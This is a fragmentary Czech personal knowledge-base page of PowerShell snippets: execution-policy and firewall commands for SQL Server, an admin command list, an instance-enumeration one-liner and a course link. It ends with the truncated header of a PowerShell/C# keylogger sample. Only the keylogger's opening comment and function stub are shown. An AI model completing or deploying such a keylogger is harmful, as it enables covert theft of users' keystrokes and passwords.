Moje knowledge base, pro Vás i pro mne. Také spousta blbin okolo.

POWERSHELL

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned   #Enabling SQL Server Ports New-NetFirewallRule -DisplayName “SQL Server” -Direction Inbound –Protocol TCP –LocalPort 1433 -Action allow New-NetFirewallRule -DisplayName “SQL Admin Connection” -Direction Inbound –Protocol TCP...
Powershell skripty jsou soubory s příponou PS1 (např. test.ps1). Tyto soubory není možné v systému spustit stejně jako běžné spustitelné soubory BAT nebo EXE apod. Skripty je možné spouštět v konzoly Powershellu, následujícím způsobem: c:\PS> test.ps1 nebo je nutné spustit Powershell s...

25 comandů pro adminy

27.03.2015 07:01
Common entries (just to get started) 1. Navigate the Windows Registry like the file system -- cd hkcu: 2. Search recursively for a certain string within files -- dir –r | select string "searchforthis" 3. Find the five processes using the most memory -- ps | sort –p ws | select –last...
[System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources()

Powershell Akademie

16.03.2015 10:34
Skvělé ...  https://www.microsoftvirtualacademy.com/training-courses/powershell-akademie      
################## # # PowerKeyShellLogger v1.0 # (C) Ondrej Sevecek, 2014 - www.sevecek.com, ondrej@sevecek.com #  # PowerShell/C# keylogger sample #  #   function Define-PowerKeyShellLogger() {   $powerKeyShellLogger = @"   using...